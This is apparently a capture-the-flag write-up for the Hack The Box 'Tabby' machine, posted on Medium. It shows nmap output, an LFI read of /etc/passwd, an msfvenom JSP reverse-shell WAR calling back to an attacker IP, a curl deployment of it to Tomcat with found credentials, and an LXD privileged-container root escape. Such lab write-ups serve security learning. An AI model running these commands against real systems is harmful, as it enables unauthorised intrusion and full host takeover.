Hackthebox — Tabby

Summary

Today we have another linux machine is retired with IP 10.10.10.194

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.194
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-23 21:01 EET
Nmap scan report for tabby.htb (10.10.10.194)
Host is up (0.083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
root@strike:~#

We have 3 open ports: 22(ssh), 80(http) and 8080(http apache)

Web enum

So i took a look for new service link

When i saw file parameter, I think about LFI
So i tried to look for /etc/passwd

I got username is ash
I think to enumerate with port 8080

Try to enumerate for users
view-source:LINK

Backdoor WAR

root@strike:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.22 LPORT=4242 -f WAR > fix.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

root@strike:~#

Now we need to upload fix.war file, So i would use curl with credentials that i found tomcat:$3cureP4s5w0rd123!

root@strike:~# curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file fix.war "http://megahosting.htb:8080/manager/text/deploy?path=/fix.war"
OK - Deployed application at context path [/fix.war]
root@strike:~#

Lunch listener

Browser

Got connection

After searching, I found interest zip file

I download it and extract, After crack found this password admin@it
So let’s connect to ash user with password

Gain user flag!

Privilege Escalation

Ref: LXD Privilege Escalation
After download lxd and run build and get alpine, I launch python simple server to upload file to machine

After upload file and import

ash@tabby:~/temp$ lxc image import ./alpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
<lpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
ash@tabby:~/temp$ lxc init bom fox -c security.privileged=true
lxc init bom fox -c security.privileged=true
Creating fox
ash@tabby:~/temp$ lxc config device add fox mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to fox
ash@tabby:~/temp$ lxc start fox
lxc start fox
ash@tabby:~/temp$ lxc exec fox /bin/sh
lxc exec fox /bin/sh
~ # ls

Search for root.txt file

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student